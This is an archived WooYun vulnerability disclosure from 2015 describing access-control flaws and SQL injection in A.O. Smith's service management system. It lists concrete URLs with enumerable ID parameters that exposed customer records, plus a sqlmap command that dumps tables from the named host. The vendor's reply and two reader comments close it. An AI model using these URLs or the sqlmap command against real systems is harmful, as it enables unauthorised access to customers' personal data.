当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143064

漏洞标题:AO史密斯某系统越权+SQL注入漏洞泄露全国范围内大量客户信息(用AOSMITH的举手)

相关厂商:hotwater.com.cn

漏洞作者: 路人甲

提交时间:2015-09-24 10:08

修复时间:2015-11-10 08:56

公开时间:2015-11-10 08:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-24: 细节已通知厂商并且等待厂商处理中
2015-09-26: 厂商已经确认,细节仅向厂商公开
2015-10-06: 细节向核心白帽子及相关领域专家公开
2015-10-16: 细节向普通白帽子公开
2015-10-26: 细节向实习白帽子公开
2015-11-10: 细节向公众公开

简要描述:

其他不说,就AO史密斯的安装师傅的专业态度就值得赞!

详细说明:

艾欧史密斯服务管理系统:

http://service.hotwater.com.cn:8099/login.asp


有多处url越权及SQL注入漏洞:
(1)第一处越权地址泄露全国各门店维修单信息,包含客户信息(姓名、电话、购买时间等),其中teamid是机构参数,可遍历获取不同门店不同时间段的数据:

http://service.hotwater.com.cn:8099/repair/ReturnDemand.asp?startdate=2011-5-21&enddate=2015-6-20&teamid=4B917&ope=1


B1.png


B2.png


(2)第二处结算信息:

http://service.hotwater.com.cn:8099/CCCByInstTeam/WebForm1.aspx?insteamid=4A660


B3.png


(3)直接泄露客户信息,参数accountid可遍历:

http://service.hotwater.com.cn:8099/query/QueryAccountAddress_Save.asp?accountid=150312000757


B4.png


(4)赠品管理

http://service.hotwater.com.cn:8099/CCCByInstTeam/Present_apply.aspx?userid=Q3TR8A00BKGK


B5.png


下面看SQL注入:

sqlmap.py -u "http://service.hotwater.com.cn:8099/CCCByInstTeam/WebDDYPJ.aspx?userid=QHT5VA001WA4" -D aosmith --tables --time-sec 2


A1.png


A2.png


A3.png


漏洞证明:

艾欧史密斯服务管理系统:

http://service.hotwater.com.cn:8099/login.asp


有多处url越权及SQL注入漏洞:
(1)第一处越权地址泄露全国各门店维修单信息,包含客户信息(姓名、电话、购买时间等),其中teamid是机构参数,可遍历获取不同门店不同时间段的数据:

http://service.hotwater.com.cn:8099/repair/ReturnDemand.asp?startdate=2011-5-21&enddate=2015-6-20&teamid=4B917&ope=1


B1.png


B2.png


(2)第二处结算信息:

http://service.hotwater.com.cn:8099/CCCByInstTeam/WebForm1.aspx?insteamid=4A660


B3.png


(3)直接泄露客户信息,参数accountid可遍历:

http://service.hotwater.com.cn:8099/query/QueryAccountAddress_Save.asp?accountid=150312000757


B4.png


(4)赠品管理

http://service.hotwater.com.cn:8099/CCCByInstTeam/Present_apply.aspx?userid=Q3TR8A00BKGK


B5.png


下面看SQL注入:

sqlmap.py -u "http://service.hotwater.com.cn:8099/CCCByInstTeam/WebDDYPJ.aspx?userid=QHT5VA001WA4" -D aosmith --tables --time-sec 2


A1.png


A2.png


A3.png


修复方案:

一起打包,20rank可好?

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-26 08:55

厂商回复:

该系统之前已有人提交漏洞,处于过渡期,目前已停用,谢谢反馈

最新状态:

暂无


漏洞评价:

评论

  1. 2015-09-26 20:57 | Hero ( 普通白帽子 | Rank:116 漏洞数:31 | 药药切克闹,充气娃娃迷幻药)

    没钱不用

  2. 2015-11-10 08:59 | xxsec ( 路人 | Rank:4 漏洞数:6 | kali,metasploit)

    挖洞不易,居然10打发了